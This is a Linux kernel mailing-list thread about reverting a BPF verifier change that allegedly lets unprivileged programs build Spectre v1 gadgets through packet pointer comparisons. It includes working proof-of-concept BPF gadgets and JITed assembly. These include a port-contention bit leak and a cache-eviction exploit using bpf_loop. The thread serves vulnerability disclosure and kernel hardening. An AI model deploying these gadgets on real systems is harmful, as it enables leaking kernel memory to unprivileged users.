
[2/3] Revert "bpf: Fix issue in verifying allow_ptr_leaks"

Message ID 20230913122827.91591-1-gerhorst@amazon.de (mailing list archive)
State New
Series [1/3] Revert "selftests/bpf: Add selftest for allow_ptr_leaks"

Commit Message

Luis Gerhorst Sept. 13, 2023, 12:28 p.m. UTC
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.

To mitigate Spectre v1, the verifier relies on static analysis to deduce
constant pointer bounds, which can then be enforced by rewriting pointer
arithmetic [1] or by index masking [2]. This relies on the fact that every
memory region to be accessed has a static upper bound and that every byte
below that bound is accessible. The verifier can only rewrite pointer
arithmetic or insert masking instructions to mitigate Spectre v1 if such a
static upper bound, below which every access is valid, can be given.
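
For illustration, here is a minimal userspace-C sketch of the general
index-masking idea (not the verifier's exact instruction sequence; the
names are made up for the example):

#include <stdint.h>

/* Clamp a possibly attacker-influenced index so that even a mispredicted
 * bounds check cannot yield an out-of-bounds address. Assumes the region
 * size is a power of two. */
static inline uint64_t mask_index(uint64_t idx, uint64_t size_pow2)
{
	return idx & (size_pow2 - 1);
}

static uint8_t read_elem(const uint8_t *base, uint64_t idx, uint64_t size_pow2)
{
	if (idx >= size_pow2)
		return 0;
	/* Even if the branch above is mispredicted, the masked index stays
	 * below size_pow2, so no byte beyond the region is loaded
	 * speculatively. */
	return base[mask_index(idx, size_pow2)];
}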

When allowing packet pointer comparisons, this introduces a way for the
program to effectively construct an accessible pointer for which no
static upper bound is known. Intuitively, this is obvious as a packet
might be of any size, and therefore 0 is the only statically known upper
bound below which every byte is always accessible (i.e., there is none).

To clarify, the problem is not that comparing two pointers can be used
for pointer leaks in the same way that comparing a pointer to a known
scalar can. That is because the "secret" components of the addresses
cancel each other out if the pointers are into the same region: with
p1 = base + o1 and p2 = base + o2, the result of p1 < p2 depends only on
the offsets, not on the base.

With [3] applied, the following malicious BPF program can be loaded into
the kernel without CAP_PERFMON:

r2 = *(u32 *)(r1 + 76) // data
r3 = *(u32 *)(r1 + 80) // data_end
r4 = r2
r4 += 1
if r4 > r3 goto exit
r5 = *(u8 *)(r2 + 0) // speculatively read secret
r5 &= 1 // choose bit to leak
// ... side channel to leak secret bit
exit:
// ...

This is jited to the following amd64 code which still contains the
gadget:

   0:   endbr64
   4:   nopl   0x0(%rax,%rax,1)
   9:   xchg   %ax,%ax
   b:   push   %rbp
   c:   mov    %rsp,%rbp
   f:   endbr64
  13:   push   %rbx
  14:   mov    0xc8(%rdi),%rsi // data
  1b:   mov    0x50(%rdi),%rdx // data_end
  1f:   mov    %rsi,%rcx
  22:   add    $0x1,%rcx
  26:   cmp    %rdx,%rcx
  29:   ja     0x000000000000003f // branch to mispredict
  2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
  30:   and    $0x1,%r8 // choose bit to leak
  34:   xor    %ebx,%ebx
  36:   cmp    %rbx,%r8
  39:   je     0x000000000000003f // branch based on secret
  3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
  3f:   xor    %eax,%eax
  41:   pop    %rbx
  42:   leaveq
  43:   retq

Here I'm using a port-contention side channel because storing the secret
to the stack causes the verifier to insert an lfence for unrelated
reasons (SSB mitigation), which would terminate the speculation.
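
For context, a rough userspace-C sketch of the measurement side of such a
port-contention channel; the assumed setup is an attacker-controlled
thread pinned to the SMT sibling of the core executing the BPF program
(illustration only, not part of this patch):

#include <stdint.h>
#include <x86intrin.h>

/* Time a burst of dependent imuls; extra imuls issued by the victim's
 * speculative path on the sibling hyperthread raise the observed latency
 * of the burst. */
static uint64_t time_imul_burst(uint64_t seed)
{
	uint64_t x = seed | 1;
	uint64_t start = __rdtsc();
	int i;

	for (i = 0; i < 1000; i++) {
		x *= 97;                    /* competes for the multiply port */
		asm volatile("" : "+r"(x)); /* force one imul per iteration */
	}

	return __rdtsc() - start;
}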

As Daniel already pointed out to me, data_end is even attacker
controlled, as one could send many packets of sufficient length to train
the branch predictor into assuming the bounds check (data + X > data_end)
will never be true. When the attacker then sends a packet with
insufficient data, the Spectre v1 gadget leaks the chosen bit of some
value that lies behind data_end.

To make it clear that the problem is not the pointer comparison but the
missing masking instruction, it can be useful to transform the code
above into the following equivalent pseudocode:

r2 = data
r3 = data_end
r6 = ... // index to access, constant does not help
r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
if !(r6 < r7) goto exit
// no masking of index in r6 happens
r2 += r6 // addr. to access
r5 = *(u8 *)(r2 + 0) // speculatively read secret
// ... leak secret as above

One idea to resolve this while still allowing for unprivileged packet
access would be to always allocate a power-of-2-sized buffer for the
packet data and then also pass the respective index mask in the skb
structure. The verifier would then have to check that this index mask is
always applied to the offset before a packet pointer is dereferenced.
This patch does not implement this extension, but only reverts [3].
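
A minimal sketch of what that could look like (the struct and field names
are hypothetical; again, this is not implemented here):

#include <stdint.h>

struct pkt {
	uint8_t *data;
	uint8_t *data_end;
	uint64_t index_mask;	/* allocation size - 1, allocation is a power of two */
};

static uint8_t read_pkt_byte(const struct pkt *p, uint64_t off)
{
	/* Masking before the dereference bounds the access to the
	 * power-of-two allocation even if the comparison below is
	 * mispredicted. */
	off &= p->index_mask;
	if (p->data + off + 1 > p->data_end)
		return 0;
	return p->data[off];
}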

[1] 979d63d50c0c0f7bc537bf821e056cc9fe5abd38 ("bpf: prevent out of bounds speculation on pointer arithmetic")
[2] b2157399cc9898260d6031c5bfe45fe137c1fbe7 ("bpf: prevent out-of-bounds speculation")
[3] d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2 ("bpf: Fix issue in verifying allow_ptr_leaks")

Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Luis Gerhorst <gerhorst@amazon.de>
Signed-off-by: Luis Gerhorst <gerhorst@cs.fau.de>
Acked-by: Hagar Gamal Halim Hemdan <hagarhem@amazon.de>
Cc: Puranjay Mohan <puranjay12@gmail.com>
---
 kernel/bpf/verifier.c | 17 ++++++++---------
 1 file changed, 8 insertions(+), 9 deletions(-)

Comments

Alexei Starovoitov Sept. 14, 2023, 4:20 p.m. UTC | #1
On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst <gerhorst@amazon.de> wrote:
>
> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>
> To mitigate Spectre v1, the verifier relies on static analysis to deduct
> constant pointer bounds, which can then be enforced by rewriting pointer
> arithmetic [1] or index masking [2]. This relies on the fact that every
> memory region to be accessed has a static upper bound and every date
> below that bound is accessible. The verifier can only rewrite pointer
> arithmetic or insert masking instructions to mitigate Spectre v1 if a
> static upper bound, below of which every access is valid, can be given.
>
> When allowing packet pointer comparisons, this introduces a way for the
> program to effectively construct an accessible pointer for which no
> static upper bound is known. Intuitively, this is obvious as a packet
> might be of any size and therefore 0 is the only statically known upper
> bound below of which every date is always accessible (i.e., none).
>
> To clarify, the problem is not that comparing two pointers can be used
> for pointer leaks in the same way in that comparing a pointer to a known
> scalar can be used for pointer leaks. That is because the "secret"
> components of the addresses cancel each other out if the pointers are
> into the same region.
>
> With [3] applied, the following malicious BPF program can be loaded into
> the kernel without CAP_PERFMON:
>
> r2 = *(u32 *)(r1 + 76) // data
> r3 = *(u32 *)(r1 + 80) // data_end
> r4 = r2
> r4 += 1
> if r4 > r3 goto exit
> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> r5 &= 1 // choose bit to leak
> // ... side channel to leak secret bit
> exit:
> // ...
>
> This is jited to the following amd64 code which still contains the
> gadget:
>
>    0:   endbr64
>    4:   nopl   0x0(%rax,%rax,1)
>    9:   xchg   %ax,%ax
>    b:   push   %rbp
>    c:   mov    %rsp,%rbp
>    f:   endbr64
>   13:   push   %rbx
>   14:   mov    0xc8(%rdi),%rsi // data
>   1b:   mov    0x50(%rdi),%rdx // data_end
>   1f:   mov    %rsi,%rcx
>   22:   add    $0x1,%rcx
>   26:   cmp    %rdx,%rcx
>   29:   ja     0x000000000000003f // branch to mispredict
>   2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>   30:   and    $0x1,%r8 // choose bit to leak
>   34:   xor    %ebx,%ebx
>   36:   cmp    %rbx,%r8
>   39:   je     0x000000000000003f // branch based on secret
>   3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>   3f:   xor    %eax,%eax
>   41:   pop    %rbx
>   42:   leaveq
>   43:   retq
>
> Here I'm using a port contention side channel because storing the secret
> to the stack causes the verifier to insert an lfence for unrelated
> reasons (SSB mitigation) which would terminate the speculation.
>
> As Daniel already pointed out to me, data_end is even attacker
> controlled as one could send many packets of sufficient length to train
> the branch prediction into assuming data_end >= data will never be true.
> When the attacker then sends a packet with insufficient data, the
> Spectre v1 gadget leaks the chosen bit of some value that lies behind
> data_end.

The above analysis is correct, but unlike traditional spec_v1
the attacker doesn't control data/data_end.
The attacker can send many large packets to train that data + X < data_end
and then send a small packet where the CPU will mispredict that branch
and data + X will speculatively read past data_end,
so the attacker can extract a bit past data_end,
but data/data_end themselves cannot be controlled.
So whether this bit is 0 or 1 has no bearing.
The attack cannot be repeated for the same location.
The attacker can read one bit 8 times in a row and all of them
will be from different locations in memory.
Same as reading 8 random bits from 8 random locations.
Hence I don't think this revert is necessary.
I don't believe you can craft an actual exploit.

Your patch 3 says:
       /* Speculative access to be prevented. */
+       char secret = *((char *) iph);
+
+       /* Leak the first bit of the secret value that lies behind data_end to a
+        * SMP silbling thread that also executes imul instructions. If the bit
+        * is 1, the silbling will experience a slowdown. */
+       long long x = secret;
+       if (secret & 1) {
+               x *= 97;
+       }

the comment is correct, but speculative access alone is not enough
to leak data.
Daniel Borkmann Sept. 14, 2023, 5:24 p.m. UTC | #2
On 9/14/23 6:20 PM, Alexei Starovoitov wrote:
> On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst <gerhorst@amazon.de> wrote:
>>
>> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>>
>> To mitigate Spectre v1, the verifier relies on static analysis to deduct
>> constant pointer bounds, which can then be enforced by rewriting pointer
>> arithmetic [1] or index masking [2]. This relies on the fact that every
>> memory region to be accessed has a static upper bound and every date
>> below that bound is accessible. The verifier can only rewrite pointer
>> arithmetic or insert masking instructions to mitigate Spectre v1 if a
>> static upper bound, below of which every access is valid, can be given.
>>
>> When allowing packet pointer comparisons, this introduces a way for the
>> program to effectively construct an accessible pointer for which no
>> static upper bound is known. Intuitively, this is obvious as a packet
>> might be of any size and therefore 0 is the only statically known upper
>> bound below of which every date is always accessible (i.e., none).
>>
>> To clarify, the problem is not that comparing two pointers can be used
>> for pointer leaks in the same way in that comparing a pointer to a known
>> scalar can be used for pointer leaks. That is because the "secret"
>> components of the addresses cancel each other out if the pointers are
>> into the same region.
>>
>> With [3] applied, the following malicious BPF program can be loaded into
>> the kernel without CAP_PERFMON:
>>
>> r2 = *(u32 *)(r1 + 76) // data
>> r3 = *(u32 *)(r1 + 80) // data_end
>> r4 = r2
>> r4 += 1
>> if r4 > r3 goto exit
>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>> r5 &= 1 // choose bit to leak
>> // ... side channel to leak secret bit
>> exit:
>> // ...
>>
>> This is jited to the following amd64 code which still contains the
>> gadget:
>>
>>     0:   endbr64
>>     4:   nopl   0x0(%rax,%rax,1)
>>     9:   xchg   %ax,%ax
>>     b:   push   %rbp
>>     c:   mov    %rsp,%rbp
>>     f:   endbr64
>>    13:   push   %rbx
>>    14:   mov    0xc8(%rdi),%rsi // data
>>    1b:   mov    0x50(%rdi),%rdx // data_end
>>    1f:   mov    %rsi,%rcx
>>    22:   add    $0x1,%rcx
>>    26:   cmp    %rdx,%rcx
>>    29:   ja     0x000000000000003f // branch to mispredict
>>    2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>>    30:   and    $0x1,%r8 // choose bit to leak
>>    34:   xor    %ebx,%ebx
>>    36:   cmp    %rbx,%r8
>>    39:   je     0x000000000000003f // branch based on secret
>>    3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>>    3f:   xor    %eax,%eax
>>    41:   pop    %rbx
>>    42:   leaveq
>>    43:   retq
>>
>> Here I'm using a port contention side channel because storing the secret
>> to the stack causes the verifier to insert an lfence for unrelated
>> reasons (SSB mitigation) which would terminate the speculation.
>>
>> As Daniel already pointed out to me, data_end is even attacker
>> controlled as one could send many packets of sufficient length to train
>> the branch prediction into assuming data_end >= data will never be true.
>> When the attacker then sends a packet with insufficient data, the
>> Spectre v1 gadget leaks the chosen bit of some value that lies behind
>> data_end.
> 
> The above analysis is correct, but unlike traditional spec_v1
> the attacker doesn't control data/data_end.
> The attack can send many large packets to train that data + X < data_end
> and then send a small packet where CPU will mispredict that branch
> and data + X will speculatively read past data_end,
> so the attacker can extract a bit past data_end,
> but data/data_end themselves cannot be controlled.
> So whether this bit 0 or 1 has no bearing.
> The attack cannot be repeated for the same location.
> The attacker can read one bit 8 times in a row and all of them
> will be from different locations in the memory.
> Same as reading 8 random bits from 8 random locations.
> Hence I don't think this revert is necessary.
> I don't believe you can craft an actual exploit.
> 
> Your patch 3 says:
>         /* Speculative access to be prevented. */
> +       char secret = *((char *) iph);
> +
> +       /* Leak the first bit of the secret value that lies behind data_end to a
> +        * SMP silbling thread that also executes imul instructions. If the bit
> +        * is 1, the silbling will experience a slowdown. */
> +       long long x = secret;
> +       if (secret & 1) {
> +               x *= 97;
> +       }
> 
> the comment is correct, but speculative access alone is not enough
> to leak data.

What you write makes sense; it will probably be hard to craft an exploit.
Where it's a bit more of an unknown to me is whether struct skb_shared_info
could have e.g. destructor_arg rather static (at least the upper address bits)
so that you would leak out kernel addresses.
Alexei Starovoitov Sept. 14, 2023, 7:47 p.m. UTC | #3
On Thu, Sep 14, 2023 at 10:24 AM Daniel Borkmann <daniel@iogearbox.net> wrote:
>
> On 9/14/23 6:20 PM, Alexei Starovoitov wrote:
> > On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst <gerhorst@amazon.de> wrote:
> >>
> >> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
> >>
> >> To mitigate Spectre v1, the verifier relies on static analysis to deduct
> >> constant pointer bounds, which can then be enforced by rewriting pointer
> >> arithmetic [1] or index masking [2]. This relies on the fact that every
> >> memory region to be accessed has a static upper bound and every date
> >> below that bound is accessible. The verifier can only rewrite pointer
> >> arithmetic or insert masking instructions to mitigate Spectre v1 if a
> >> static upper bound, below of which every access is valid, can be given.
> >>
> >> When allowing packet pointer comparisons, this introduces a way for the
> >> program to effectively construct an accessible pointer for which no
> >> static upper bound is known. Intuitively, this is obvious as a packet
> >> might be of any size and therefore 0 is the only statically known upper
> >> bound below of which every date is always accessible (i.e., none).
> >>
> >> To clarify, the problem is not that comparing two pointers can be used
> >> for pointer leaks in the same way in that comparing a pointer to a known
> >> scalar can be used for pointer leaks. That is because the "secret"
> >> components of the addresses cancel each other out if the pointers are
> >> into the same region.
> >>
> >> With [3] applied, the following malicious BPF program can be loaded into
> >> the kernel without CAP_PERFMON:
> >>
> >> r2 = *(u32 *)(r1 + 76) // data
> >> r3 = *(u32 *)(r1 + 80) // data_end
> >> r4 = r2
> >> r4 += 1
> >> if r4 > r3 goto exit
> >> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> >> r5 &= 1 // choose bit to leak
> >> // ... side channel to leak secret bit
> >> exit:
> >> // ...
> >>
> >> This is jited to the following amd64 code which still contains the
> >> gadget:
> >>
> >>     0:   endbr64
> >>     4:   nopl   0x0(%rax,%rax,1)
> >>     9:   xchg   %ax,%ax
> >>     b:   push   %rbp
> >>     c:   mov    %rsp,%rbp
> >>     f:   endbr64
> >>    13:   push   %rbx
> >>    14:   mov    0xc8(%rdi),%rsi // data
> >>    1b:   mov    0x50(%rdi),%rdx // data_end
> >>    1f:   mov    %rsi,%rcx
> >>    22:   add    $0x1,%rcx
> >>    26:   cmp    %rdx,%rcx
> >>    29:   ja     0x000000000000003f // branch to mispredict
> >>    2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
> >>    30:   and    $0x1,%r8 // choose bit to leak
> >>    34:   xor    %ebx,%ebx
> >>    36:   cmp    %rbx,%r8
> >>    39:   je     0x000000000000003f // branch based on secret
> >>    3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
> >>    3f:   xor    %eax,%eax
> >>    41:   pop    %rbx
> >>    42:   leaveq
> >>    43:   retq
> >>
> >> Here I'm using a port contention side channel because storing the secret
> >> to the stack causes the verifier to insert an lfence for unrelated
> >> reasons (SSB mitigation) which would terminate the speculation.
> >>
> >> As Daniel already pointed out to me, data_end is even attacker
> >> controlled as one could send many packets of sufficient length to train
> >> the branch prediction into assuming data_end >= data will never be true.
> >> When the attacker then sends a packet with insufficient data, the
> >> Spectre v1 gadget leaks the chosen bit of some value that lies behind
> >> data_end.
> >
> > The above analysis is correct, but unlike traditional spec_v1
> > the attacker doesn't control data/data_end.
> > The attack can send many large packets to train that data + X < data_end
> > and then send a small packet where CPU will mispredict that branch
> > and data + X will speculatively read past data_end,
> > so the attacker can extract a bit past data_end,
> > but data/data_end themselves cannot be controlled.
> > So whether this bit 0 or 1 has no bearing.
> > The attack cannot be repeated for the same location.
> > The attacker can read one bit 8 times in a row and all of them
> > will be from different locations in the memory.
> > Same as reading 8 random bits from 8 random locations.
> > Hence I don't think this revert is necessary.
> > I don't believe you can craft an actual exploit.
> >
> > Your patch 3 says:
> >         /* Speculative access to be prevented. */
> > +       char secret = *((char *) iph);
> > +
> > +       /* Leak the first bit of the secret value that lies behind data_end to a
> > +        * SMP silbling thread that also executes imul instructions. If the bit
> > +        * is 1, the silbling will experience a slowdown. */
> > +       long long x = secret;
> > +       if (secret & 1) {
> > +               x *= 97;
> > +       }
> >
> > the comment is correct, but speculative access alone is not enough
> > to leak data.
>
> What you write makes sense, it will probably be hard to craft an exploit.
> Where it's a bit more of an unknown to me is whether struct skb_shared_info
> could have e.g. destructor_arg rather static (at last the upper addr bits)
> so that you would leak out kernel addresses.

You mean since skb_shared_info is placed after skb->end
and in the zero-copy case destructor_arg may be initialized with the same
kernel pointer for multiple skbs?
The attacker cannot construct the address from data_end.
The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END.
But the attacker can do skb->data + X.
The idea is that they can train the branch to mispredict with
a large packet and then send a small one so that shared_info
after skb->end has the same uarg pointer in all packets?
So every skb->data+X is a different location, but all of them
point to data that has uarg==destructor_arg ?

That would be feasible in theory, but in order to speculate the loads
the branch mispredict has to be reliable.
The spec v1 attack requires that one of the two loads feeding
into the compare operation be slow.
In this case both data and data_end loads are going to be fast.
The attacker cannot evict skb->data or skb->data_end from cache.
Remember that we rearranged the 'max_entries' field in struct bpf_map
specifically to be in a different cache line than the fields
controlled by user space. That was a necessary part of the spec v1 attack.
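
Roughly this (illustrative only, not the actual struct bpf_map
definition):

#include <stdalign.h>
#include <stdatomic.h>

/* Keep the field that feeds the speculated bounds check on a different
 * cache line than state user space can dirty, so the attacker cannot
 * make the bound's load slow by touching the same line. */
struct example_map {
	alignas(64) unsigned int max_entries;	/* consumed by the bounds check */
	alignas(64) atomic_uint usercnt;	/* touched from user space */
};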

So I still believe this revert is unnecessary and this speculative
execution is not exploitable.
Yafang Shao Sept. 15, 2023, 2:26 a.m. UTC | #4
On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst <gerhorst@amazon.de> wrote:
>
> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>
> To mitigate Spectre v1, the verifier relies on static analysis to deduct
> constant pointer bounds, which can then be enforced by rewriting pointer
> arithmetic [1] or index masking [2]. This relies on the fact that every
> memory region to be accessed has a static upper bound and every date
> below that bound is accessible. The verifier can only rewrite pointer
> arithmetic or insert masking instructions to mitigate Spectre v1 if a
> static upper bound, below of which every access is valid, can be given.
>
> When allowing packet pointer comparisons, this introduces a way for the
> program to effectively construct an accessible pointer for which no
> static upper bound is known. Intuitively, this is obvious as a packet
> might be of any size and therefore 0 is the only statically known upper
> bound below of which every date is always accessible (i.e., none).
>
> To clarify, the problem is not that comparing two pointers can be used
> for pointer leaks in the same way in that comparing a pointer to a known
> scalar can be used for pointer leaks. That is because the "secret"
> components of the addresses cancel each other out if the pointers are
> into the same region.
>
> With [3] applied, the following malicious BPF program can be loaded into
> the kernel without CAP_PERFMON:
>
> r2 = *(u32 *)(r1 + 76) // data
> r3 = *(u32 *)(r1 + 80) // data_end
> r4 = r2
> r4 += 1
> if r4 > r3 goto exit
> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> r5 &= 1 // choose bit to leak
> // ... side channel to leak secret bit
> exit:
> // ...
>
> This is jited to the following amd64 code which still contains the
> gadget:
>
>    0:   endbr64
>    4:   nopl   0x0(%rax,%rax,1)
>    9:   xchg   %ax,%ax
>    b:   push   %rbp
>    c:   mov    %rsp,%rbp
>    f:   endbr64
>   13:   push   %rbx
>   14:   mov    0xc8(%rdi),%rsi // data
>   1b:   mov    0x50(%rdi),%rdx // data_end
>   1f:   mov    %rsi,%rcx
>   22:   add    $0x1,%rcx
>   26:   cmp    %rdx,%rcx
>   29:   ja     0x000000000000003f // branch to mispredict
>   2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>   30:   and    $0x1,%r8 // choose bit to leak
>   34:   xor    %ebx,%ebx
>   36:   cmp    %rbx,%r8
>   39:   je     0x000000000000003f // branch based on secret
>   3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>   3f:   xor    %eax,%eax
>   41:   pop    %rbx
>   42:   leaveq
>   43:   retq
>
> Here I'm using a port contention side channel because storing the secret
> to the stack causes the verifier to insert an lfence for unrelated
> reasons (SSB mitigation) which would terminate the speculation.
>
> As Daniel already pointed out to me, data_end is even attacker
> controlled as one could send many packets of sufficient length to train
> the branch prediction into assuming data_end >= data will never be true.
> When the attacker then sends a packet with insufficient data, the
> Spectre v1 gadget leaks the chosen bit of some value that lies behind
> data_end.
>
> To make it clear that the problem is not the pointer comparison but the
> missing masking instruction, it can be useful to transform the code
> above into the following equivalent pseudocode:
>
> r2 = data
> r3 = data_end
> r6 = ... // index to access, constant does not help
> r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
> if !(r6 < r7) goto exit
> // no masking of index in r6 happens
> r2 += r6 // addr. to access
> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> // ... leak secret as above
>
> One idea to resolve this while still allowing for unprivileged packet
> access would be to always allocate a power of 2 for the packet data and
> then also pass the respective index mask in the skb structure. The
> verifier would then have to check that this index mask is always applied
> to the offset before a packet pointer is dereferenced. This patch does
> not implement this extension, but only reverts [3].

Hi Luis,

The skb pointer comparison is a reasonable operation in a networking BPF prog.
If we just prohibit a reasonable operation to prevent a possible
Spectre v1 attack, it looks a little weird, right?
Should we figure out a real fix to prevent it?
Luis Gerhorst Sept. 18, 2023, 11:25 a.m. UTC | #5
On Thu, 14 Sep 2023 12:47:16 -0700, Alexei Starovoitov wrote:
> You mean since skb_shared_info is placed after skb->end
> and in zero copy case destructor_arg may be initialized with the same
> kernel pointer for multiple skb-s ?
> The attacker cannot construct the address from data_end.
> The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END.
> But the attacker can do skb->data + X.
> The idea is that they can train the branch to mispredict with
> a large packet and then send a small one so that shared_info
> after skb->end has the same uarg pointer in all packets?
> So every skb->data+X is a different location, but all of them
> point to data that has uarg==destructor_arg ?
>
> That would be feasible in theory, but in order to speculate the loads
> the branch mispredict has to be reliable.
> The spec v1 attack requires one of two loads feeding
> into compare operation has to be slow.
> In this case both data and data_end loads are going to be fast.
> The attacker cannot evict skb->data or skb->data_end from cache.

It is true that this is not easily possible using the method most exploits use,
at least to my knowledge (i.e., accessing the same address from another core).
However, it is still possible to evict the cacheline with skb->data/data_end
from the cache in between the loads by iterating over a large map using
bpf_loop(). Then the load of skb->data_end would be slow while skb->data is
readily available in a callee-saved register.

For a CPU with 64KiB of per-core L1 cache, all 64-byte cachelines can be evicted
by iterating over a 64KiB array in 64-byte increments; that's only 1k
iterations. Meanwhile, skb->data can stay safe in r15 as this register is not
used by bpf_loop() and bpf_map_lookup_elem(). Even evicting the L2 cache might
be possible as bpf_loop() currently has an iteration limit of 8 million. To
extend that, userspace could work on evicting the L3 cache from other cores and
make the speculation window even larger. This would of course slow the whole
reading process down, but in return you can also leak more data by indexing
into the leak array using a full byte.

For reference, here's the full program and assembly it is jited to:

static long callback_fn(__u32 index, void *ctx) {
	__u32 key = index * 8;
	__u64 *value = bpf_map_lookup_elem(&evictmap, &key);
	if (value) {
		*value = 2 * *value;
		return 0;
	}
	return 1;
}

SEC("tcx/ingress")
__naked void pkt_ptr(void)
{
	// +76: data
	// +80: data_end
	asm volatile (" \
r6 = 0; \
r7 = r1; \
prepare_data_%=: \
r8 = *(u32 *)(r1 + 76); \
r9 = r8; \
r9 += 34; \
evict_loop_%=: \
w1 = 1024;		\
r2 = %[callback_fn] ll; \
r3 = 0; \
*(u64 *)(r10 - 8) = r3; \
r3 = r10; \
r3 += -8; \
r4 = 0; \
call %[bpf_loop]; \
gadget_%=: \
r2 = *(u32 *)(r7 + 80);	  \
if r2 <= r9 goto exit_%=; \
r5 = *(u8 *)(r7 + 14); \
*(u64*)(r10 - 8) = r5; \
r2 = r10; \
r2 += -8; \
r1 = %[leakmap] ll; \
call %[bpf_map_lookup_elem]; \
if r0 == 0 goto exit_%=; \
r6 = *(u64 *)(r0 + 0); \
exit_%=: r0 = r6; \
exit; \
"	:
    : __imm_addr(leakmap),
	  __imm_addr(callback_fn),
	  __imm(bpf_loop),
	  __imm(bpf_map_lookup_elem)
	: __clobber_all);
}

bpf_prog_64fe264baec539aa_pkt_ptr:
; asm volatile (" \
   0:   endbr64
   4:   nopl   0x0(%rax,%rax,1)
   9:   xchg   %ax,%ax
   b:   push   %rbp
   c:   mov    %rsp,%rbp
   f:   endbr64
  13:   sub    $0x20,%rsp
  1a:   push   %rbx
  1b:   push   %r13
  1d:   push   %r14
  1f:   push   %r15
  21:   xor    %ebx,%ebx
  23:   mov    %rdi,%r13
  26:   mov    0xc8(%rdi),%r14
  2d:   mov    %r14,%r15
  30:   add    $0x22,%r15 // data prepared
  34:   mov    $0x2000,%edi
  39:   movabs $0xffffffffc01d09b0,%rsi
  43:   xor    %edx,%edx
  45:   mov    %rdx,-0x8(%rbp)
  49:   lfence
  4c:   mov    %rbp,%rdx
  4f:   add    $0xfffffffffffffff8,%rdx
  53:   xor    %ecx,%ecx
  55:   cmp    $0x800000,%rdi
  5c:   jbe    0x0000000000000065
  5e:   mov    $0xfffffff9,%eax
  63:   jmp    0x00000000000000a2
  65:   mov    %rbx,-0x20(%rbp)
  69:   mov    %r13,-0x18(%rbp)
  6d:   mov    %r14,-0x10(%rbp)
  71:   mov    %rdi,%rbx
  74:   xor    %r13d,%r13d
  77:   mov    %rdx,%r14
  7a:   cmp    %rbx,%r13
  7d:   jae    0x0000000000000093
  7f:   mov    %r13,%rdi
  82:   mov    %r14,%rsi
  85:   callq  0x0000000000000148
  8a:   add    $0x1,%r13
  8e:   test   %rax,%rax
  91:   je     0x000000000000007a
  93:   mov    %r13,%rax
  96:   mov    -0x20(%rbp),%rbx
  9a:   mov    -0x18(%rbp),%r13
  9e:   mov    -0x10(%rbp),%r14
  a2:   mov    0x50(%r13),%rsi // load data_end
  a6:   cmp    %r15,%rsi // use of data_end and data
  a9:   jbe    0x00000000000000f7 // to mispredict
  ab:   movzwq 0x7c(%r13),%r8 // use of data
  b0:   shr    $0x10,%r8d
  b4:   and    $0xff,%r8d
  bb:   mov    %r8,-0x8(%rbp)
  bf:   mov    %rbp,%rsi
  c2:   add    $0xfffffffffffffff8,%rsi
  c6:   movabs $0xffffb85680acd000,%rdi
  d0:   add    $0x210,%rdi
  d7:   mov    0x0(%rsi),%eax
  da:   cmp    $0x20000,%rax
  e1:   jae    0x00000000000000ec
  e3:   shl    $0x3,%rax
  e7:   add    %rdi,%rax
  ea:   jmp    0x00000000000000ee
  ec:   xor    %eax,%eax
  ee:   test   %rax,%rax
  f1:   je     0x00000000000000f7
  f3:   mov    0x0(%rax),%rbx
  f7:   mov    %rbx,%rax
  fa:   pop    %r15
  fc:   pop    %r14
  fe:   pop    %r13
 100:   pop    %rbx
 101:   leaveq
 102:   retq

long callback_fn(__u32 index, void * ctx):
bpf_prog_8e1ec5bf965fdd4a_callback_fn:
; __u32 key = index * 8;
   0:   endbr64
   4:   nopl   0x0(%rax,%rax,1)
   9:   xchg   %ax,%ax
   b:   push   %rbp
   c:   mov    %rsp,%rbp
   f:   endbr64
  13:   sub    $0x8,%rsp
  1a:   shl    $0x3,%edi
; __u32 key = index * 8;
  1d:   mov    %edi,-0x4(%rbp)
  20:   lfence
  23:   mov    %rbp,%rsi
;
  26:   add    $0xfffffffffffffffc,%rsi
; __u64 *value = bpf_map_lookup_elem(&evictmap, &key);
  2a:   movabs $0xffffb85680a01000,%rdi
  34:   add    $0x210,%rdi
  3b:   mov    0x0(%rsi),%eax
  3e:   cmp    $0x1000,%rax
  45:   jae    0x0000000000000050
  47:   shl    $0x3,%rax
  4b:   add    %rdi,%rax
  4e:   jmp    0x0000000000000052
  50:   xor    %eax,%eax
  52:   mov    $0x1,%edi
; if (value) {
  57:   test   %rax,%rax
  5a:   je     0x0000000000000069
; *value = 2 * *value;
  5c:   mov    0x0(%rax),%rdi
; *value = 2 * *value;
  60:   shl    %rdi
; *value = 2 * *value;
  63:   mov    %rdi,0x0(%rax)
  67:   xor    %edi,%edi
; }
  69:   mov    %rdi,%rax
  6c:   leaveq
  6d:   retq

> Remember that we rearranged 'max_entries' field in struct bpf_map
> specifically to be in the different cache line vs fields
> controlled by user space. It was the necessary part of spec v1 attack.
Luis Gerhorst Sept. 18, 2023, 11:52 a.m. UTC | #6
On 15/09/2023 04:26, Yafang Shao wrote:
